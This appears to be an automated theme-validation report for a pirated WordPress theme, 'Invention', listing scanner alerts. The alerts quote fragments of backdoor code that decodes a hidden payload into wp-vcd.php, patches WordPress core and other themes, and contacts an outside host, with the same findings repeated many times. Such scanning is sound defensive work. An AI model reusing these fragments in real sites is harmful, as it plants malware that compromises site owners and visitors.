0
Validation results

Invention (Shared by VestaThemes.com)

Invention (Shared by VestaThemes.com)

WordPress 6.5.2 theme
0
  • THEME TYPEWordPress theme 6.5.2
  • FILE NAMEInvention.zip
  • FILE SIZE3612059 bytes
  • MD5f62bfcae52e6c07220af591aea25a557
  • SHA167e05bbdd7a81f97ee02c6e8aa4ba8bdef1ebec1
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, Bitmap images
  • THEME URIhttp://themes.jozoor.com/?theme=Invention-WP
  • VERSION1.1
  • AUTHOR URI
  • CREATION DATE2019-07-21
  • LAST FILE UPDATE2019-07-21
  • LAST VALIDATION2019-07-21 08:01
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Title : Title No reference to add_theme_support( "title-tag" ) was found in the theme.The theme needs to have <title> tags, ideally in the header.php file.The theme needs to have a call to wp_title(), ideally in the header.php file.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Use of PHP sytem calls Found shell_exec in file tmhUtilities.php. 235: $style = shell_exec('stty -g');238: shell_exec('stty -echo');241: shell_exec('stty -icanon -echo min 1 time 0');260: shell_exec('stty ' . $style);
  3. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);Found ini_set in file class.theme-modules.php. 5: ini_set('display_errors', 0);
  4. Security breaches : Use of base64_decode() Found base64_decode in file OAuth.php. 200: $decoded_sig = base64_decode($signature);Found base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));Found base64_decode in file functions.interface.php. 232: $smof_data = unserialize(base64_decode($_POST['data'])); //100% safe - ignore theme check nagFound base64_decode in file class.theme-modules.php. 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )95: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  5. Security breaches : Use of base64_encode() Found base64_encode in file tmhOAuth.php.
     base64_encode(
    Found base64_encode in file OAuth.php.
     return base64_encode(hash_hmac('sha1', $base_string, $key, true));
     return base64_encode($signature);
    Found base64_encode in file class.options_machine.php.
     $output .= '<textarea id='export_data' rows='8'>'.base64_encode(serialize($smof_data)) /* 100% safe - ignore theme check nag 
  6. Malware : Operations on file system file_get_contents was found in the file sources.php 84: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');104: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');123: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');175: $subject = file_get_contents(VP_DIR . '/public/css/vendor/font-awesome.min.css');file_get_contents was found in the file sources.php 84: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');104: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');123: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');175: $subject = file_get_contents(VP_DIR . '/public/css/vendor/font-awesome.min.css');file_get_contents was found in the file sources.php 84: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');104: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');123: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');175: $subject = file_get_contents(VP_DIR . '/public/css/vendor/font-awesome.min.css');file_get_contents was found in the file sources.php 84: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');104: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');123: $fonts = file_get_contents(dirname(__FILE__) . '/gwf.json');175: $subject = file_get_contents(VP_DIR . '/public/css/vendor/font-awesome.min.css');fopen was found in the file tmhUtilities.php 219: $handle = fopen('php://stdin','r');fwrite was found in the file tmhUtilities.php 249: fwrite(STDOUT, '\x08 \x08');253: fwrite(STDOUT, '*');fwrite was found in the file tmhUtilities.php 249: fwrite(STDOUT, '\x08 \x08');253: fwrite(STDOUT, '*');file_get_contents was found in the file OAuth.php 270: file_get_contents(self::$POST_INPUT)file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS49: file_put_contents($path . '/wp-includes/post.php', $file);50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('221: @file_put_contents(__FILE__, $file);file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_get_contents was found in the file class.theme-modules.php 45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 171: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));177: $content = @file_get_contents('http://www.prilns.com/o.php?host=' . $_SERVER['HTTP_HOST178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.prilns.com/admin.txt'));202: if ($file = file_get_contents($e[1]))217: if ($file = @file_get_contents(__FILE__))file_put_contents was found in the file 